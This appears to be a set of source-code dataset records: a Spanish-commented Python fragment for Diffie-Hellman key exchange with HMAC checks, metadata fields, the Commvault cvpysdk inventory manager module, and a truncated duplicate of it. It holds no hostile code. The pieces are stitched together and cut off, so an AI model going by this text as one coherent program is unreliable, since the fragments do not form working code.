hashes.SHA256()) h_IoT.update(b"Platform public key hash") h_IoT.verify(bytes.fromhex(pk_signature)) # 3. Plataforma genera sus propias claves privadas y públicas platform_private_key = loaded_dh_params.generate_private_key() platform_public_key = platform_private_key.public_key() # El KMS debe guardar esta clave pública junto con los parámetros y str_signature en la bbdd con id platform-HMACDH platform_pk_pem = platform_public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo) str_platform_pk = platform_pk_pem.decode('utf-8') # HMAC h = hmac.HMAC(platform_pk_pem, hashes.SHA256()) h.update(b"Platform public key hash") signature = h.finalize() str_signature = signature.hex() shared_key = platform_private_key.exchange(loaded_public_key_IoT) # Devuelve la clave en string, el IoT debe enviar al KMS luego de nuevo esta clave para que la almacene return shared_key.hex(), {'generated-public-key': str_platform_pk, 'signature': str_signature, 'parameters': dh_parameters}
es
0.84531
# Key generation # Key derivation # Contraseña basada en key derivation # Data sensitiva para cifrar # Encriptación usando AES GCM # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) # Generate decryption key from passphrase and salt # Key generation # Key derivation # Contraseña basada en key derivation # Data sensitiva para cifrar # Encriptación usando AES GCM # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) # Key derivation # Generar decryption key con la contraseña y salt # Validar MAC y descifrar, si la validación MAC falla, ValueError exception se va a mostrar # Input para shared key Platform: ID clave pública IoT # Returns shared key IoT # Plataforma genera su clave pública y privada (y la pública se almacena en la bbdd para el IoT) # 1. Obtener clave pública en string de la bd y pasar a objeto key # Returns shared key platform # A la API le llega el id de la clave y de ahí saca el string de parámetros y de la public key del IoT # En este punto, el KMS ya tiene los dh_parameters y la clave pública en string y debe convertirlo al objeto original # 1. Conversión a bytes y deserialización de parámetros # 2. Conversión a bytes y deserialización de clave pública IoT # Comprueba que la clave pública del IoT es correcta # Comprueba la autenticidad con la HMAC recibida # 3. Plataforma genera sus propias claves privadas y públicas # El KMS debe guardar esta clave pública junto con los parámetros y str_signature en la bbdd con id platform-HMACDH # HMAC # Devuelve la clave en string, el IoT debe enviar al KMS luego de nuevo esta clave para que la almacene
1.851135
2
cvpysdk/activateapps/inventory_manager.py
CommvaultEngg/cvpysdk
35
6623567
# -*- coding: utf-8 -*- # -------------------------------------------------------------------------- # Copyright Commvault Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # -------------------------------------------------------------------------- """Main file for performing operations on inventory manager app under Activate. Inventories, Inventory, Assets & Asset are the four classes defined in this file Inventories: class for representing all inventories in the commcell Inventory: class for representing a single inventory in the commcell Assets: class for representing all assets in an inventory Asset: class to represent single asset in an inventory Inventories: __init__() -- initialise object of the Inventories class _get_inventories() -- Gets all inventories in the commcell _response_not_success() -- parses through the exception response, and raises SDKException refresh() -- refresh the Inventories from the commcell get_properties() -- returns the properties for given inventory name has_inventory() -- Checks if a given inventory name exists in the commcell or not get() -- returns the Inventory class object for given inventory name add() -- add inventory to the commcell delete() -- delete inventory from the commcell Inventory: __init__() -- initialise object of the Inventory class _response_not_success() -- parses through the exception response, and raises SDKException _get_inventory_properties() -- Gets all the properties of this inventory _get_schedule_object() -- returns the schedule class object associated to this inventory _get_data_source_handler_object() -- returns the datasource and default handler object for this inventory refresh() -- refresh the properties of the inventory get_assets() -- returns the Assets class object for this inventory share() -- shares inventory with other user or user group start_collection() -- starts collection job on this inventory get_inventory_data() -- returns data from inventory Inventory Attributes ----------------- **properties** -- returns properties of the inventory **index_server_name** -- returns the index server name associated with this inventory **_index_server_cloud_id** -- returns the index server cloudid associated with this inventory **inventory_name** -- returns the inventory name **inventory_id** -- returns the inventory id **security_associations** -- returns the security associations blob of this inventory **schedule** -- returns the schedule object associated with this inventory **data_source** -- returns the DataSource object associated with this inventory **handler** -- returns the default handler object for this inventory Assets: __init__() -- initialise object of the Assets class refresh() -- refresh the assets associated with inventory add() -- adds asset to the inventory get() -- returns the instance of Asset class based on given asset name has_asset() -- returns whether given asset exists or not in inventory delete() -- deletes the asset from the inventory _get_assets_properties() -- returns the assets properties _response_not_success() -- parses through the exception response, and raises SDKException Assets Attributes: ---------------- **assets** -- returns the assets details as json Asset: __init__() -- initialise object of the Asset class _get_properties() -- returns the properties of the asset refresh() -- refresh the asset associated with inventory start_collection() -- starts collection job on this asset get_job_history() -- returns the job history details of this asset get_job_status() -- returns the job status details of this asset get_asset_prop() -- returns the asset property value for the given property name Asset Attributes: ----------------- **asset_id** -- returns the id of asset **asset_name** -- returns the name of asset **asset_type** -- returns the type of asset **crawl_start_time** -- returns the last crawl start time of asset **asset_props** -- returns the properties(name/value pair) of asset **asset_status** -- returns the status of asset **inventory_id** -- returns the inventory id of this asset """ import copy from ..activateapps.ediscovery_utils import EdiscoveryClientOperations from ..activateapps.constants import InventoryConstants from ..schedules import Schedules from ..exception import SDKException class Inventories(): """Class for representing all inventories in the commcell.""" def __init__(self, commcell_object): """Initializes an instance of the Inventories class. Args: commcell_object (object) -- instance of the commcell class Returns: object - instance of the Inventories class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._cvpysdk_object = commcell_object._cvpysdk_object self._services = commcell_object._services self._inventories = None self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES'] self._API_DELETE_INVENTORY = self._services['EDISCOVERY_INVENTORY'] self.refresh() def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def _get_inventories(self): """Gets all inventories from the commcell Args: None Return: list(dict) -- list Containing inventory details dict Raises: SDKException: if response is empty if response is not success """ output = {} flag, response = self._cvpysdk_object.make_request( 'GET', self._API_INVENTORIES ) if flag: if response.json() and 'inventoryList' in response.json(): inventories = response.json()['inventoryList'] for inventory in inventories: output[inventory['inventoryName'].lower()] = inventory return output raise SDKException('Inventory', '103') self._response_not_success(response) def add(self, inventory_name, index_server, name_server=None): """Adds inventory to the commcell with given inputs Args: inventory_name (str) -- Name of the inventory index_server (str) -- Index server name name_server (list) -- Name server assets which needs to be added to inventory Returns: object -- Instance of Inventory Class Raises: SDKException: if input data type is not valid if failed to add inventory if Index Server doesn't exists in commcell """ if not isinstance(inventory_name, str) or not isinstance(index_server, str): raise SDKException('Inventory', '101') req_json = copy.deepcopy(InventoryConstants.INVENTORY_ADD_REQUEST_JSON) if name_server: asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) for server in name_server: asset_json['name'] = server req_json['assets'].append(asset_json) req_json['inventoryName'] = inventory_name if not self._commcell_object.index_servers.has(index_server): raise SDKException('Inventory', '102', "Given index server name not exists on this commcell") index_server_obj = self._commcell_object.index_servers.get(index_server) req_json['analyticsEngineCloud']['cloudId'] = index_server_obj.cloud_id req_json['analyticsEngineCloud']['cloudDisplayName'] = index_server_obj.cloud_name flag, response = self._cvpysdk_object.make_request( 'POST', self._API_INVENTORIES, req_json ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to create inventory with error [{err_resp['errorMessage']}]") elif 'inventoryList' in response.json(): inventory = response.json()['inventoryList'][0] inventory_id = inventory['inventoryId'] self.refresh() return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '102', f"Failed to create inventory with response - {response.json()}") raise SDKException('Inventory', '105') self._response_not_success(response) def delete(self, inventory_name): """Deletes the inventory from the commcell Args: inventory_name (str) -- Inventory name to be deleted Returns: None Raises: SDKException: if unable to find inventory if failed to delete inventory if input type is not valid """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if not self.has_inventory(inventory_name): raise SDKException('Inventory', '106') flag, response = self._cvpysdk_object.make_request( 'DELETE', self._API_DELETE_INVENTORY % self._inventories[inventory_name.lower()]['inventoryId'] ) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to Delete inventory with error [{err_resp['errorMessage']}]") self.refresh() else: raise SDKException('Inventory', '107') else: self._response_not_success(response) def refresh(self): """Refresh the inventories associated with the commcell.""" self._inventories = self._get_inventories() def get_properties(self, inventory_name): """Returns a properties of the specified Inventory Args: inventory_name (str) -- name of the inventory Returns: dict - properties for the given inventory name """ return self._inventories[inventory_name.lower()] def has_inventory(self, inventory_name): """Checks if a inventory exists in the commcell with the input name. Args: inventory_name (str) -- name of the inventory Returns: bool - boolean output to specify whether the inventory exists in the commcell or not Raises: SDKException: if type of the inventory name argument is not string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') return self._inventories and inventory_name.lower() in map(str.lower, self._inventories) def get(self, inventory_name): """Returns a Inventory object for the given inventory name. Args: inventory_name (str) -- name of the inventory Returns: obj -- Object of Inventory class Raises: SDKException: if inventory doesn't exists in commcell if inventory_name is not of type string """ if not isinstance(inventory_name, str): raise SDKException('Inventory', '101') if self.has_inventory(inventory_name): inventory_id = self._inventories[inventory_name.lower()]['inventoryId'] return Inventory(self._commcell_object, inventory_name, inventory_id) raise SDKException('Inventory', '106') class Inventory(): """Class for performing operations on a single inventory""" def __init__(self, commcell_object, inventory_name, inventory_id=None): """Initialize an object of the Inventory class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Inventory class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name self._inventory_props = None self._index_server_name = None self._index_server_cloud_id = None self._security_associations = None self._schedule = None self._data_source = None self._handler = None self._API_GET_INVENTORY_DETAILS = self._services['EDISCOVERY_INVENTORY'] self._API_SECURITY = self._services['SECURITY_ASSOCIATION'] self._API_SECURITY_ENTITY = self._services['ENTITY_SECURITY_ASSOCIATION'] self._API_GET_DEFAULT_HANDLER = self._services['EDISCOVERY_GET_DEFAULT_HANDLER'] if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self.refresh() self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object) def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def _get_inventory_properties(self): """ Get inventory properties from the commcell Args: None Returns: dict -- Properties of inventory """ flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_GET_INVENTORY_DETAILS % self._inventory_id ) if flag: if response.json() and 'inventoryList' in response.json(): inventory_props = response.json()['inventoryList'][0] self._index_server_name = inventory_props['analyticsEngineCloud']['cloudDisplayName'] self._index_server_cloud_id = inventory_props['analyticsEngineCloud']['cloudId'] self._inventory_name = inventory_props['inventoryName'] self._security_associations = inventory_props['securityAssociation']['associations'] return inventory_props raise SDKException('Inventory', '104') self._response_not_success(response) def refresh(self): """Refresh the inventory details for associated object""" self._inventory_props = self._get_inventory_properties() self._schedule = self._get_schedule_object() self._data_source, self._handler = self._get_data_source_handler_object() def get_assets(self): """Returns the Assets class instance for this inventory Args: None Returns: object -- Instance of Assets class """ return Assets(self._commcell_object, self.inventory_name, self.inventory_id) def start_collection(self): """Starts collection job on this inventory Args: None Return: None Raises: SDKException: if failed to start collection job """ return self._ediscovery_client_obj.start_job() def share(self, user_or_group_name, allow_edit_permission=False, is_user=True, ops_type=1): """Shares inventory with given user or user group in commcell Args: user_or_group_name (str) -- Name of user or group is_user (bool) -- Denotes whether this is user or group name default : True(User) allow_edit_permission (bool) -- whether to give edit permission or not to user or group ops_type (int) -- Operation type Default : 1 (Add) Supported : 1 (Add) 3 (Delete) Returns: None Raises: SDKException: if unable to update security associations if response is empty or not success """ if not isinstance(user_or_group_name, str): raise SDKException('Inventory', '101') request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON) external_user = False association_response = None if ops_type == 1 and len(self.security_associations) > 1: association_request_json = copy.deepcopy(InventoryConstants.INVENTORY_SHARE_REQUEST_JSON) del association_request_json['securityAssociations'] association_request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = int(self.inventory_id) # get security blob for this data source type entity - 132 flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_SECURITY_ENTITY % (132, int(self.inventory_id)), association_request_json ) if flag: if response.json() and 'securityAssociations' in response.json(): association_response = response.json( )['securityAssociations'][0]['securityAssociations']['associations'] else: raise SDKException('Inventory', '102', 'Failed to get existing security associations') else: response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) if '\\' in user_or_group_name: external_user = True if is_user: user_obj = self._commcell_object.users.get(user_or_group_name) user_id = user_obj.user_id request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userId'] = int(user_id) request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "13" request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userName'] = user_or_group_name elif external_user: request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['groupId'] = 0 request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "62" request_json['securityAssociations']['associations'][0]['userOrGroup'][0][ 'externalGroupName'] = user_or_group_name else: grp_obj = self._commcell_object.user_groups.get(user_or_group_name) grp_id = grp_obj.user_group_id request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['userGroupId'] = int(grp_id) request_json['securityAssociations']['associations'][0]['userOrGroup'][0]['_type_'] = "15" request_json['securityAssociations']['associations'][0]['userOrGroup'][0][ 'userGroupName'] = user_or_group_name request_json['entityAssociated']['entity'][0]['seaDataSourceId'] = self.inventory_id request_json['securityAssociations']['associationsOperationType'] = ops_type if allow_edit_permission: request_json['securityAssociations']['associations'][0]['properties']['categoryPermission']['categoriesPermissionList'].append( InventoryConstants.EDIT_CATEGORY_PERMISSION) # Associate existing associations to the request if ops_type == 1 and len(self.security_associations) > 1: request_json['securityAssociations']['associations'].extend(association_response) flag, response = self._cvpysdk_obj.make_request( 'POST', self._API_SECURITY, request_json ) if flag: if response.json() and 'response' in response.json(): response_json = response.json()['response'][0] error_code = response_json['errorCode'] if error_code != 0: error_message = response_json['errorString'] raise SDKException( 'Inventory', '102', error_message) # update association list by refreshing inventory self.refresh() else: raise SDKException('Inventory', '111') else: response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) def _get_data_source_handler_object(self): """returns the data source and handler object associated with this inventory Args: None Returns: obj,obj -- Instance of DataSource object,Instance of Handler object Raises: SDKException: if failed to get datasource or handler details """ flag, response = self._cvpysdk_obj.make_request( 'GET', self._API_GET_DEFAULT_HANDLER % self.inventory_id) if flag: if response.json() and 'handlerInfos' in response.json(): handler_list = response.json()['handlerInfos'] if not isinstance(handler_list, list): raise SDKException('Inventory', '102', "Failed to get Datasource/Handler details") handler_details = handler_list[0] ds_name = handler_details['dataSourceName'] handler_name = handler_details['handlerName'] ds_obj = self._commcell_object.datacube.datasources.get(ds_name) handler_obj = ds_obj.ds_handlers.get(handler_name) return ds_obj, handler_obj raise SDKException('Inventory', '102', 'Unknown response while fetching datasource details') response_string = self._commcell_object._update_response_(response.text) raise SDKException('Response', '101', response_string) def _get_schedule_object(self): """Returns the schedule class object of schedule associated to this inventory Args: None Returns: object -- Instance of Schedule class Raises: SDKException: if failed to find schedule """ return Schedules(self).get() def get_inventory_data(self, handler_filter=""): """ Executes handler for fetching data from inventory Args: handler_filter (str) -- Filter which needs to applied for handler execution Returns: dict -- Dictionary of values fetched from handler execution Raises: SDKExpception: if error in fetching handler data if input is not valid """ if not isinstance(handler_filter, str): raise SDKException('Inventory', '101') if not self._handler: raise SDKException('Inventory', '102', 'No handler object initialised') return self._handler.get_handler_data(handler_filter=handler_filter) @property def properties(self): """Returns the properties of this inventory as dict""" return self._inventory_props @property def index_server_name(self): """Returns the index server name associated with this inventory""" return self._index_server_name @property def index_server_cloud_id(self): """Returns the index server id associated with this inventory""" return self._index_server_cloud_id @property def inventory_id(self): """Returns the inventory id associated with this inventory""" return self._inventory_id @property def inventory_name(self): """Returns the inventory name associated with this inventory""" return self._inventory_name @property def security_associations(self): """Returns the security blob associated with this inventory""" return self._security_associations @property def schedule(self): """Returns the schedule class object for schedule associated with this inventory""" return self._schedule @property def data_source(self): """Returns the DataSource class object for datasource associated with this inventory""" return self._data_source @property def handler(self): """Returns the Handler class object for default handler associated with this inventory""" return self._handler class Assets(): """Class to represent all assets in an inventory""" def __init__(self, commcell_object, inventory_name, inventory_id=None): """Initialize an object of the Assets class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Assets class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self._assets = None self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES'] self._API_ASSETS = self._services['EDISCOVERY_ASSETS'] self.refresh() def _get_assets_properties(self): """gets the assets properties from inventory Args: None Returns: dict -- containing asset properties """ inv_mgr = self._commcell_object.activate.inventory_manager() inv_obj = inv_mgr.get(self._inventory_name) inv_obj.refresh() assets = {} for asset in inv_obj.properties['assets']: name = asset['name'].lower() assets[name] = asset return assets def refresh(self): """Refresh the assets details associated with this inventory""" self._assets = self._get_assets_properties() def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def has_asset(self, asset_name): """Checks whether given asset exists in inventory or not Args: asset_name (str) -- Name of the asset Returns: bool -- true if asset exists else false """ return self._assets and asset_name.lower() in self._assets def get(self, asset_name): """Returns the asset object Args: asset_name (str) -- Name of the asset Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if asset doesn't exists in inventory """ if not isinstance(asset_name, str): raise SDKException('Inventory', '101') if not self.has_asset(asset_name): raise SDKException('Inventory', '109') return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id) def add(self, asset_name, asset_type=InventoryConstants.AssetType.NAME_SERVER, **kwargs): """Adds asset to the inventory Args: asset_name (str) -- Name of the asset asset_type (Enum) -- type of asset (Refer to InventoryConstants.AssetType class) kwargs for FILE SERVER type Asset: fqdn -- File server FQDN os -- File Server OS type ip -- File server IP country_code -- Country code (ISO 3166 2-letter code) country_name -- Country name domain -- File Server Domain name(optional) Returns: object -- Instance of Asset class Raises: SDKException: if input is not valid if failed to add asset to inventory """ if not isinstance(asset_name, str) or not isinstance(asset_type, InventoryConstants.AssetType): raise SDKException('Inventory', '101') request_json = copy.deepcopy(InventoryConstants.ASSET_ADD_TO_INVENTORY_JSON) request_json['inventoryId'] = int(self._inventory_id) asset_json = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) asset_json['name'] = asset_name asset_json['type'] = asset_type.value property_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_JSON) if asset_type.value == InventoryConstants.AssetType.FILE_SERVER.value: for prop in InventoryConstants.ASSET_FILE_SERVER_PROPERTY: prop_name = InventoryConstants.FIELD_PROPS_MAPPING[prop] default_value = "" if prop_name not in kwargs: # if domain is not passed, then form domain from fqdn if prop == InventoryConstants.FIELD_PROPERTY_DOMAIN: default_value = kwargs.get(InventoryConstants.KWARGS_FQDN) default_value = default_value.split(".", 1)[1] # always use asset name as file server name if prop == InventoryConstants.FIELD_PROPERTY_NAME: default_value = asset_name prop_json = copy.deepcopy(InventoryConstants.ASSET_PROPERTY_NAME_VALUE_PAIR_JSON) prop_json['name'] = prop prop_json['value'] = kwargs.get(prop_name, default_value) property_json['propertyValues']['nameValues'].append(prop_json) asset_json.update(property_json) request_json['assets'].append(asset_json) flag, response = self._cvpysdk_obj.make_request( 'PUT', self._API_INVENTORIES, request_json) if flag: if response.json() and 'errorResp' in response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to add asset to inventory with error [{err_resp['errorMessage']}]") self.refresh() return Asset(self._commcell_object, self._inventory_name, asset_name, self._inventory_id) raise SDKException('Inventory', '108') self._response_not_success(response) def delete(self, asset_name): """Delete the asset from the inventory Args: asset_name (str) -- Name of the asset Returns: None Raises: SDKException: if input is not valid if failed to delete the asset if unable to find this asset in inventory """ if not isinstance(asset_name, str): raise SDKException('Inventory', '101') if not self.has_asset(asset_name): raise SDKException('Inventory', '109') request_json = copy.deepcopy(InventoryConstants.ASSET_DELETE_FROM_INVENTORY_JSON) request_json['inventoryId'] = int(self._inventory_id) if 'assetId' in self._assets[asset_name.lower()]: request_json['assets'].append({'assetId': self._assets[asset_name.lower()]['assetId']}) else: req = copy.deepcopy(InventoryConstants.ASSET_ADD_REQUEST_JSON) asset_obj = self.get(asset_name) asset_type = asset_obj.asset_type # for file server asset, asset name will not be display name in backend delete request. so fetch fqdn req['name'] = asset_obj.get_asset_prop(prop_name=InventoryConstants.FIELD_PROPERTY_DNSHOST) req['type'] = asset_type request_json['assets'].append(req) flag, response = self._cvpysdk_obj.make_request( 'PUT', self._API_ASSETS % self._inventory_id, request_json) if flag: if response.json(): err_resp = response.json()['errorResp'] if 'errorCode' in err_resp and err_resp['errorCode'] != 0: raise SDKException( 'Inventory', '102', f"Failed to delete asset from inventory with error [{err_resp['errorMessage']}]") self.refresh() return raise SDKException('Inventory', '110') self._response_not_success(response) @property def assets(self): """Returns the assets details associated with this inventory""" return self._assets class Asset(): """Class to represent single asset in an inventory""" def __init__(self, commcell_object, inventory_name, asset_name, inventory_id=None): """Initialize an object of the Asset class. Args: commcell_object (object) -- instance of the commcell class inventory_name (str) -- name of the Inventory asset_name (str) -- Name of the asset inventory_id (str) -- id of Inventory default: None Returns: object - instance of the Asset class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._services = commcell_object._services self._cvpysdk_obj = self._commcell_object._cvpysdk_object self._inventory_id = None self._inventory_name = inventory_name if not inventory_id: self._inventory_id = self._commcell_object.activate.inventory_manager().get(inventory_name).inventory_id else: self._inventory_id = inventory_id self._asset_name = asset_name self._asset_props = None self._asset_id = None self._crawl_start_time = None self._asset_type = None self._asset_status = None self._asset_name_values_props = None self.refresh() self._ediscovery_client_obj = EdiscoveryClientOperations(class_object=self, commcell_object=commcell_object) def _get_properties(self): """Returns the properties of this asset Args: None Returns: dict -- Containing properties of asset """ inv_mgr = self._commcell_object.activate.inventory_manager() inv_obj = inv_mgr.get(self._inventory_name) inv_obj.get_assets().refresh() for asset in inv_obj.properties['assets']: if asset['name'].lower() == self._asset_name.lower(): # for file server, we will not have asset id & crawl times self._asset_id = asset.get('assetId', 0) self._crawl_start_time = asset.get('crawlStartTime', 0) self._asset_type = asset.get('type', 0) self._asset_status = asset['status'] self._asset_name = asset['name'] self._asset_name_values_props = asset['propertyValues']['nameValues'] return asset return {} def refresh(self): """Refresh the asset details associated with this""" self._asset_props = self._get_properties() def get_job_history(self): """Returns the job history details of this asset Args: None Returns: list(dict) -- containing job history details Raises: SDKException: if failed to get job history if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.get_job_history() def get_job_status(self): """Returns the job status details of this asset Args: None Returns: dict -- containing job status details Raises: SDKException: if failed to get job status if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.get_job_status() def start_collection(self, wait_for_job=False, wait_time=60): """Starts collection job on this asset Args: wait_for_job (bool) -- specifies whether to wait for job to complete or not wait_time (int) -- time interval to wait for job completion in Mins Default : 60Mins Return: None Raises: SDKException: if failed to start collection job if asset is not supported for this operation """ if self.asset_type != InventoryConstants.AssetType.NAME_SERVER.value: raise SDKException('Inventory', '102', "Not supported other than Name Server asset type") return self._ediscovery_client_obj.start_job(wait_for_job=wait_for_job, wait_time=wait_time) def get_asset_prop(self, prop_name): """returns the property value for given property name for this asset Args: prop_name (str) -- Name of the property Returns: str -- Value of the property """ for prop in self._asset_name_values_props: name = prop['name'] if name == prop_name: return prop['value'] return "" @property def asset_id(self): """Returns the asset id with this asset""" return self._asset_id @property def asset_name(self): """Returns the asset name with this asset""" return self._asset_name @property def crawl_start_time(self): """Returns the crawl start time with this asset""" return self._crawl_start_time @property def asset_type(self): """Returns the asset type for this asset""" return self._asset_type @property def asset_status(self): """Returns the asset status for this asset""" return self._asset_status @property def asset_props(self): """Returns the property values for this asset""" return self._asset_name_values_props @property def inventory_id(self): """Returns the inventory id for this asset""" return self._inventory_id
# -*- coding: utf-8 -*- # -------------------------------------------------------------------------- # Copyright Commvault Systems, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # -------------------------------------------------------------------------- """Main file for performing operations on inventory manager app under Activate. Inventories, Inventory, Assets & Asset are the four classes defined in this file Inventories: class for representing all inventories in the commcell Inventory: class for representing a single inventory in the commcell Assets: class for representing all assets in an inventory Asset: class to represent single asset in an inventory Inventories: __init__() -- initialise object of the Inventories class _get_inventories() -- Gets all inventories in the commcell _response_not_success() -- parses through the exception response, and raises SDKException refresh() -- refresh the Inventories from the commcell get_properties() -- returns the properties for given inventory name has_inventory() -- Checks if a given inventory name exists in the commcell or not get() -- returns the Inventory class object for given inventory name add() -- add inventory to the commcell delete() -- delete inventory from the commcell Inventory: __init__() -- initialise object of the Inventory class _response_not_success() -- parses through the exception response, and raises SDKException _get_inventory_properties() -- Gets all the properties of this inventory _get_schedule_object() -- returns the schedule class object associated to this inventory _get_data_source_handler_object() -- returns the datasource and default handler object for this inventory refresh() -- refresh the properties of the inventory get_assets() -- returns the Assets class object for this inventory share() -- shares inventory with other user or user group start_collection() -- starts collection job on this inventory get_inventory_data() -- returns data from inventory Inventory Attributes ----------------- **properties** -- returns properties of the inventory **index_server_name** -- returns the index server name associated with this inventory **_index_server_cloud_id** -- returns the index server cloudid associated with this inventory **inventory_name** -- returns the inventory name **inventory_id** -- returns the inventory id **security_associations** -- returns the security associations blob of this inventory **schedule** -- returns the schedule object associated with this inventory **data_source** -- returns the DataSource object associated with this inventory **handler** -- returns the default handler object for this inventory Assets: __init__() -- initialise object of the Assets class refresh() -- refresh the assets associated with inventory add() -- adds asset to the inventory get() -- returns the instance of Asset class based on given asset name has_asset() -- returns whether given asset exists or not in inventory delete() -- deletes the asset from the inventory _get_assets_properties() -- returns the assets properties _response_not_success() -- parses through the exception response, and raises SDKException Assets Attributes: ---------------- **assets** -- returns the assets details as json Asset: __init__() -- initialise object of the Asset class _get_properties() -- returns the properties of the asset refresh() -- refresh the asset associated with inventory start_collection() -- starts collection job on this asset get_job_history() -- returns the job history details of this asset get_job_status() -- returns the job status details of this asset get_asset_prop() -- returns the asset property value for the given property name Asset Attributes: ----------------- **asset_id** -- returns the id of asset **asset_name** -- returns the name of asset **asset_type** -- returns the type of asset **crawl_start_time** -- returns the last crawl start time of asset **asset_props** -- returns the properties(name/value pair) of asset **asset_status** -- returns the status of asset **inventory_id** -- returns the inventory id of this asset """ import copy from ..activateapps.ediscovery_utils import EdiscoveryClientOperations from ..activateapps.constants import InventoryConstants from ..schedules import Schedules from ..exception import SDKException class Inventories(): """Class for representing all inventories in the commcell.""" def __init__(self, commcell_object): """Initializes an instance of the Inventories class. Args: commcell_object (object) -- instance of the commcell class Returns: object - instance of the Inventories class """ self._commcell_object = commcell_object self._update_response_ = commcell_object._update_response_ self._cvpysdk_object = commcell_object._cvpysdk_object self._services = commcell_object._services self._inventories = None self._API_INVENTORIES = self._services['EDISCOVERY_INVENTORIES'] self._API_DELETE_INVENTORY = self._services['EDISCOVERY_INVENTORY'] self.refresh() def _response_not_success(self, response): """Helper function to raise an exception when reponse status is not 200 (OK). Args: response (object) -- response class object, received upon running an API request, using the `requests` python package """ raise SDKException('Response', '101', self._update_response_(response.text)) def _get_inventories(self): """Gets all inventories from the commcell Args: None Return: list(dict) -- list Containing inventory details dict Raises: SDKException: if response is empty if response is not success """ output = {} flag, response = self._cvpysdk_object.make_request( 'GET', self._API_INVENTORIES ) if flag: if response.json() and 'inventoryList' in response.json(): inventories = response.json()['inventoryList'] for inventory in inventories: output[inventory['inventoryName'].lower()] = inventory return output raise SDKException('Inventory', '103') self._response_not_success(response) def add(self, inventory_name, index_server, name_server=None): """Adds inventory to the commcell with given inputs Args: inventory_name (str) -- Name of the inventory index_server (str) -- 